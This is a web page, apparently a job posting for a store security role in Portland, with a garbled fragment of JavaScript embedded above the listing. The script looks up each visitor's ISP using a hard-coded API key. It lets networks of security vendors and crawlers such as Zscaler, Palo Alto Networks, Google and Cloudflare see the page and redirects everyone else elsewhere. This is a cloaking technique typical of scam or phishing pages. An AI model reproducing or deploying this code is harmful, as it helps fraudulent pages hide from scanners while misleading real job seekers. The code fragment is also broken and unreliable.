Store Protection Specialist
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Store Protection Specialist in Portland, Oregon, to ensure a safe and secure shopping environment.
Responsibilities:
- Monitor store activities to prevent theft, vandalism, and security breaches.
- Conduct regular patrols and surveillance to identify suspicious behavior.
- Collaborate with store staff to implement loss prevention strategies.
- Respond promptly to security incidents, emergencies, and customer concerns.
- Maintain accurate incident reports and communicate findings effectively.
Skills Needed:
- Strong attention to detail and situational awareness.
- Excellent communication and interpersonal skills.
- Ability to remain calm and professional under pressure.
- Basic knowledge of security equipment and protocols.
- Physical fitness to perform patrol duties.
Benefits:
- Competitive compensation package.
- Comprehensive health, dental, and vision insurance.
- Paid time off and holiday pay.
- Opportunities for career growth and development.
- Supportive team environment and training programs.